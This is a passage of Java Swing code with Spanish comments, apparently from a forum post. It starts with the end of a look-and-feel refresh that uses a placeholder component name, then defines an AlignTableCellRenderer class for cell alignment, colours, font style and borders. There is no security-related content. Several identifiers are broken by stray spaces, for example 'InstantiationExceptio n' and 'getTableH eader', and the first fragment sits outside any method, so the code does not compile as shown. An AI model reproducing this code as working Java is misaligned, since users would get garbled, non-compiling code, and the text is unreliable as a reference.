//Ejecutar una actualización para todos los JFrames, JDialoge e. o, que estan activos o que quedan como instancias
SwingUtilities.updateComponentTreeUI(XXXXXXXX);
//Opcional
pack();
}
catch(ClassNotFoundException|InstantiationExceptio n|IllegalAccessException|UnsupportedLookAndFeelExc eption ex)
{
ex.printStackTrace();
}
public class AlignTableCellRenderer extends DefaultTableCellRenderer.UIResource
{
private DefaultTableCellRenderer renderizador;
private int horizontalAlignment=SwingConstants.CENTER;
private Color foregroundColor=null;
private Color backgroundColor=null;
private Border frontera=null;
private int fontstyle=Font.PLAIN;
public AlignTableCellRenderer(JTable table)
{
renderizador=(DefaultTableCellRenderer)table.getTableH eader().getDefaultRenderer();
}
public AlignTableCellRenderer(JTable table,int horizontalAlignment)
{
this(table);
this.horizontalAlignment=horizontalAlignment;
}
public AlignTableCellRenderer(JTable table,int horizontalAlignment,Color foregroundColor)
{
this(table);
this.horizontalAlignment=horizontalAlignment;
this.foregroundColor=foregroundColor;
}
public AlignTableCellRenderer(JTable table,int horizontalAlignment,int fontstyle,Color foregroundColor)
{
this(table);
this.horizontalAlignment=horizontalAlignment;
this.foregroundColor=foregroundColor;
this.fontstyle=fontstyle;
}
public AlignTableCellRenderer(JTable table,int horizontalAlignment,Border frontera)
{
this(table);
this.horizontalAlignment=horizontalAlignment;
this.frontera=frontera;
}
public AlignTableCellRenderer(JTable table,Border frontera)
{
this(table);
this.frontera=frontera;
}
public void setForegroundColor(Color foregroundColor)
{
this.foregroundColor=foregroundColor;
}
public void setBackgroundColor(Color backgroundColor)
{
this.backgroundColor=backgroundColor;
}
public void setFontstyle(int fontstyle)
{
this.fontstyle=fontstyle;
}
@Override
public Component getTableCellRendererComponent(JTable table,Object value,boolean isSelected,boolean hasFocus,int row,int column)
{
JLabel label=(JLabel)renderizador.getTableCellRendererCompone nt(table,value,isSelected,hasFocus,row,column);
label.setHorizontalAlignment(horizontalAlignment);
label.setFont(label.getFont().deriveFont(fontstyle ));
if(foregroundColor!=null)
{
label.setForeground(foregroundColor);
}
if(backgroundColor!=null)
{
label.setBackground(backgroundColor);
}
if(frontera!=null)
{
label.setBorder(frontera);
}
return label;
}
}